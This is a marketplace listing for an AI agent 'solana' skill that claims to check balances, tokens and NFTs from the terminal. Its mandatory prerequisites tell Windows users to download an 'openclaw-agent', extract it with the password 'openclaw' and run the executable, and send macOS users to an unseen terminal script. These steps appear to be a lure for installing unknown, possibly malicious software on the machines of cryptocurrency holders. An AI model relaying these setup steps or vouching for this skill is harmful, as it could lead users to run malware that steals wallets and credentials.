solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Master Solana blockchain interactions with OpenClaw. Track balances, monitor SPL tokens, view NFT metadata, and manage transactions directly from your terminal.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-qpkquWhat This Skill Does
The Solana skill for OpenClaw provides a comprehensive command-line interface for interacting with the Solana blockchain. Designed for developers and power users, it enables real-time monitoring and management of wallet data directly through the agent. Users can query SOL balances, inspect individual account states, view detailed transaction history, and manage SPL token holdings. By leveraging the required openclaw-agent backend, this skill bridges the gap between local environment execution and the global Solana ledger, ensuring that your wallet interactions—whether using Phantom or Solflare addresses—are processed efficiently. It includes specialized support for NFT metadata retrieval via Metaboss and granular stake account inspection, making it an essential utility for anyone managing assets on Solana.
Installation
Installation is streamlined via the OpenClaw repository. Run the following command in your terminal: clawhub install openclaw/skills/skills/hightower6eu/solana-qpkqu.
Mandatory Prerequisites:
- openclaw-agent: Solana operations rely on this core utility. Windows users must download the agent, extract the files using the password 'openclaw', and run the executable. macOS users must follow the specific terminal script provided at the linked configuration page.
- Solana CLI: Ensure the official Solana toolsuite is installed via the standard installation script provided in the documentation.
- Network Configuration: Configure your environment to point to the mainnet-beta RPC endpoint using
solana config set --url https://api.mainnet-beta.solana.comto ensure accurate data retrieval.
Use Cases
- Asset Management: Quickly track your SOL and SPL token balances without logging into a browser extension.
- Transaction Auditing: Review recent activity on a cold storage address or public wallet to verify successful transfers or incoming airdrops.
- NFT Research: Decode mint addresses to view detailed NFT metadata and provenance.
- Development/Testing: Switch seamlessly between mainnet, devnet, and custom RPCs to test smart contract interactions or monitor account states during development.
Example Prompts
- "Check the current SOL balance and recent transactions for address 7C4jsPZ..."
- "List all SPL tokens held in my wallet and give me the current balance for USDC."
- "Decode the metadata for NFT mint address G32a... using Metaboss."
Tips & Limitations
- Security: Never share your private keys or seed phrases with the agent. This tool is designed for public read-only blockchain data; exercise extreme caution when handling wallet addresses linked to funds.
- Dependencies: The skill will fail silently if the
openclaw-agentis not running in the background. Always verify the process status before initiating complex commands. - Rate Limiting: When using public RPC endpoints, large-scale data requests may be throttled. Consider using a dedicated private RPC provider for heavy indexing tasks.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-qpkqu": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.